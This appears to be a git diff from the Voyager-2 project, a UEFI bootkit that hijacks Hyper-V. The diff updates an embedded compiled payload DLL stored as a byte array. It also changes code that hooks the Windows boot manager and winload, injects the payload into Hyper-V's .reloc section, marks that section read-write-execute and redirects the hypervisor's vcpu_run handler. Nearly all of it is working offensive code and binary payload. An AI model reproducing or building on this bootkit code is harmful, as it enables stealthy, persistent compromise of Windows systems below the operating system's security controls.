0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x13, 0xB9, 0x72, 0x5F, 0x00, 0x00, 0x00, 0x00, - 0x02, 0x00, 0x00, 0x00, 0x56, 0x00, 0x00, 0x00, 0x38, 0x20, 0x00, 0x00, - 0x38, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0xB9, 0x72, 0x5F, - 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, - 0x90, 0x20, 0x00, 0x00, 0x90, 0x06, 0x00, 0x00, 0x52, 0x53, 0x44, 0x53, - 0xD4, 0x11, 0x42, 0x7D, 0x4D, 0x15, 0x9E, 0x40, 0xAD, 0x44, 0xBC, 0xDA, - 0x99, 0x36, 0xE3, 0xCF, 0x01, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x55, + 0x00, 0x00, 0x00, 0x00, 0x91, 0x48, 0x75, 0x5F, 0x00, 0x00, 0x00, 0x00, + 0x02, 0x00, 0x00, 0x00, 0x59, 0x00, 0x00, 0x00, 0x38, 0x20, 0x00, 0x00, + 0x38, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x91, 0x48, 0x75, 0x5F, + 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, + 0x94, 0x20, 0x00, 0x00, 0x94, 0x06, 0x00, 0x00, 0x52, 0x53, 0x44, 0x53, + 0xCE, 0x74, 0x7C, 0x88, 0x8C, 0xD6, 0x6B, 0x49, 0x87, 0x35, 0x71, 0x34, + 0xAF, 0x3B, 0x11, 0xC5, 0x01, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x55, 0x73, 0x65, 0x72, 0x73, 0x5C, 0x78, 0x65, 0x72, 0x6F, 0x78, 0x5C, 0x44, 0x65, 0x73, 0x6B, 0x74, 0x6F, 0x70, 0x5C, 0x76, 0x6F, 0x79, 0x61, 0x67, - 0x65, 0x72, 0x5C, 0x78, 0x36, 0x34, 0x5C, 0x52, 0x65, 0x6C, 0x65, 0x61, - 0x73, 0x65, 0x5C, 0x50, 0x61, 0x79, 0x4C, 0x6F, 0x61, 0x64, 0x28, 0x49, - 0x6E, 0x74, 0x65, 0x6C, 0x29, 0x2E, 0x70, 0x64, 0x62, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0xA2, 0x00, 0x00, 0x00, - 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x6D, 0x6E, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x20, 0x00, 0x00, 0x38, 0x00, 0x00, 0x00, 0x2E, 0x72, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0x38, 0x20, 0x00, 0x00, 0xD8, 0x00, 0x00, 0x00, - 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x24, 0x7A, 0x7A, 0x7A, 0x64, 0x62, - 0x67, 0x00, 0x00, 0x00, 0x10, 0x21, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, - 0x2E, 0x78, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, - 0x28, 0x00, 0x00, 0x00, 0x2E, 0x62, 0x73, 0x73, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x40, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x2E, 0x70, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 0x6C, 0x00, 0x00, 0x00, - 0x2E, 0x65, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x02, 0x0E, 0x03, 0x00, - 0x01, 0x16, 0x00, 0x06, 0x0E, 0xA2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x65, 0x72, 0x5C, 0x56, 0x6F, 0x79, 0x61, 0x67, 0x65, 0x72, 0x2D, 0x32, + 0x5C, 0x78, 0x36, 0x34, 0x5C, 0x52, 0x65, 0x6C, 0x65, 0x61, 0x73, 0x65, + 0x5C, 0x50, 0x61, 0x79, 0x4C, 0x6F, 0x61, 0x64, 0x2E, 0x70, 0x64, 0x62, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, + 0x20, 0x01, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x6D, 0x6E, + 0x00, 0x00, 0x00, 0x00, 0x20, 0x11, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00, + 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x73, 0x00, 0x00, 0x20, 0x00, 0x00, + 0x38, 0x00, 0x00, 0x00, 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, + 0x38, 0x20, 0x00, 0x00, 0xEC, 0x00, 0x00, 0x00, 0x2E, 0x72, 0x64, 0x61, + 0x74, 0x61, 0x24, 0x7A, 0x7A, 0x7A, 0x64, 0x62, 0x67, 0x00, 0x00, 0x00, + 0x24, 0x21, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x2E, 0x78, 0x64, 0x61, + 0x74, 0x61, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, + 0x2E, 0x62, 0x73, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, + 0x0C, 0x00, 0x00, 0x00, 0x2E, 0x70, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, + 0x00, 0x50, 0x00, 0x00, 0x65, 0x00, 0x00, 0x00, 0x2E, 0x65, 0x64, 0x61, + 0x74, 0x61, 0x00, 0x00, 0x02, 0x0A, 0x06, 0x00, 0x02, 0x16, 0x00, 0x06, + 0x0A, 0x34, 0x06, 0x00, 0x0A, 0x32, 0x06, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, @@ -199,7 +199,7 @@ unsigned char PayLoad[3072] = 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, - 0xA2, 0x10, 0x00, 0x00, 0x10, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x18, 0x11, 0x00, 0x00, 0x24, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, @@ -245,12 +245,12 @@ unsigned char PayLoad[3072] = 0x00, 0x00, 0x00, 0x00, 0x32, 0x50, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x28, 0x50, 0x00, 0x00, 0x2C, 0x50, 0x00, 0x00, 0x30, 0x50, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, - 0x45, 0x50, 0x00, 0x00, 0x00, 0x00, 0x50, 0x61, 0x79, 0x4C, 0x6F, 0x61, - 0x64, 0x28, 0x49, 0x6E, 0x74, 0x65, 0x6C, 0x29, 0x2E, 0x64, 0x6C, 0x6C, - 0x00, 0x3F, 0x76, 0x6F, 0x79, 0x61, 0x67, 0x65, 0x72, 0x5F, 0x63, 0x6F, - 0x6E, 0x74, 0x65, 0x78, 0x74, 0x40, 0x40, 0x33, 0x55, 0x5F, 0x56, 0x4F, - 0x59, 0x41, 0x47, 0x45, 0x52, 0x5F, 0x44, 0x41, 0x54, 0x41, 0x5F, 0x54, - 0x40, 0x40, 0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x3E, 0x50, 0x00, 0x00, 0x00, 0x00, 0x50, 0x61, 0x79, 0x4C, 0x6F, 0x61, + 0x64, 0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x3F, 0x76, 0x6F, 0x79, 0x61, 0x67, + 0x65, 0x72, 0x5F, 0x63, 0x6F, 0x6E, 0x74, 0x65, 0x78, 0x74, 0x40, 0x73, + 0x76, 0x6D, 0x40, 0x40, 0x33, 0x55, 0x5F, 0x76, 0x6F, 0x79, 0x61, 0x67, + 0x65, 0x72, 0x5F, 0x74, 0x40, 0x31, 0x40, 0x41, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, diff --git a/Voyager-2/Voyager-2 (2004-1709)/PayLoad.h b/Voyager-2/Voyager-2 (2004-1709)/PayLoad.h index 1430a93..172565f 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/PayLoad.h +++ b/Voyager-2/Voyager-2 (2004-1709)/PayLoad.h @@ -3,14 +3,14 @@ extern unsigned char PayLoad[3072]; #pragma pack(push, 1) -typedef struct _voyager_t +typedef struct _VOYAGER_T { - UINT64 VmExitHandlerRva; + UINT64 VCpuRunHandlerRVA; UINT64 HypervModuleBase; UINT64 HypervModuleSize; UINT64 ModuleBase; UINT64 ModuleSize; -} voyager_t, * pvoyager_t; +} VOYAGER_T, *PVOYAGER_T; #pragma pack(pop) UINT32 PayLoadSize(VOID); diff --git a/Voyager-2/Voyager-2 (2004-1709)/UefiMain.c b/Voyager-2/Voyager-2 (2004-1709)/UefiMain.c index 24dc87c..aec8ad7 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/UefiMain.c +++ b/Voyager-2/Voyager-2 (2004-1709)/UefiMain.c @@ -22,11 +22,14 @@ EFI_STATUS EFIAPI UefiMain DBG_PRINT("unable to restore bootmgfw... reason -> %r\n", Result); return Result; } + DBG_PRINT("restored bootmgfw on disk...\n"); if (EFI_ERROR((Result = InstallBootMgfwHooks(ImageHandle)))) { DBG_PRINT("Failed to install bootmgfw hooks... reason -> %r\n", Result); return Result; } + + DBG_PRINT("installed bootmgfw hooks...\n"); return EFI_SUCCESS; } \ No newline at end of file diff --git a/Voyager-2/Voyager-2 (2004-1709)/Voyager-2 (2004-1709).vcxproj b/Voyager-2/Voyager-2 (2004-1709)/Voyager-2 (2004-1709).vcxproj index bd8f39f..c99bbf3 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/Voyager-2 (2004-1709).vcxproj +++ b/Voyager-2/Voyager-2 (2004-1709)/Voyager-2 (2004-1709).vcxproj @@ -24,7 +24,7 @@ {540d433f-c2df-49a6-895c-f5c74b014777} HyperMe 10.0 - Voyager-1 (2004-1709) + Voyager-2 (2004-1709) @@ -175,7 +175,7 @@ - + @@ -184,7 +184,7 @@ - + diff --git a/Voyager-2/Voyager-2 (2004-1709)/Voyager-2 (2004-1709).vcxproj.filters b/Voyager-2/Voyager-2 (2004-1709)/Voyager-2 (2004-1709).vcxproj.filters index 555200b..bb0d0ac 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/Voyager-2 (2004-1709).vcxproj.filters +++ b/Voyager-2/Voyager-2 (2004-1709)/Voyager-2 (2004-1709).vcxproj.filters @@ -26,10 +26,10 @@ Source Files - + Source Files - + Source Files @@ -40,9 +40,6 @@ Header Files - - Header Files - Header Files @@ -52,5 +49,8 @@ Header Files + + Header Files + \ No newline at end of file diff --git a/Voyager-2/Voyager-2 (2004-1709)/WinLoad.c b/Voyager-2/Voyager-2 (2004-1709)/WinLoad.c index d36e964..e6bc338 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/WinLoad.c +++ b/Voyager-2/Voyager-2 (2004-1709)/WinLoad.c @@ -48,7 +48,7 @@ EFI_STATUS EFIAPI BlLdrLoadImage(VOID* Arg1, CHAR16* ModulePath, CHAR16* ModuleN { if (!AsciiStrCmp(&pSection->Name, ".reloc")) { - voyager_t VoyagerData; + VOYAGER_T VoyagerData; MakeVoyagerData ( &VoyagerData, @@ -59,24 +59,19 @@ EFI_STATUS EFIAPI BlLdrLoadImage(VOID* Arg1, CHAR16* ModulePath, CHAR16* ModuleN ); DBG_PRINT(".reloc section base address -> 0x%p\n", TableEntry->ModuleBase + pSection->VirtualAddress); - DBG_PRINT(".reloc section end (aka golden record base address) -> 0x%p\n", TableEntry->ModuleBase + pSection->VirtualAddress + pSection->Misc.VirtualSize); + DBG_PRINT(".reloc section end (aka payload base address) -> 0x%p\n", TableEntry->ModuleBase + pSection->VirtualAddress + pSection->Misc.VirtualSize); - VOID* VmExitHook = MapModule(&VoyagerData, PayLoad); - if (!VmExitHook) - return Result; - - VOID* VmExitFunction = HookVmExit + VOID* VCpuRunHook = MapModule(&VoyagerData, PayLoad); + VOID* VmExitFunction = HookVCpuRun ( VoyagerData.HypervModuleBase, VoyagerData.HypervModuleSize, - VmExitHook + VCpuRunHook ); - if (!VmExitFunction) - return Result; pSection->Characteristics = SECTION_RWX; pSection->Misc.VirtualSize += PayLoadSize(); - DBG_PRINT("VmExitHook (PayLoad Entry Point) -> 0x%p\n", VmExitHook); + DBG_PRINT("vcpu_run hook (payload entry point) -> 0x%p\n", VCpuRunHook); } } diff --git a/Voyager-2/Voyager-2 (2004-1709)/WinLoad.h b/Voyager-2/Voyager-2 (2004-1709)/WinLoad.h index bf75013..56e5588 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/WinLoad.h +++ b/Voyager-2/Voyager-2 (2004-1709)/WinLoad.h @@ -1,6 +1,6 @@ #pragma once #include "Utils.h" -#include "Hvix64.h" +#include "Hvax64.h" #include "PayLoad.h" extern SHITHOOK WinLoadImageShitHook;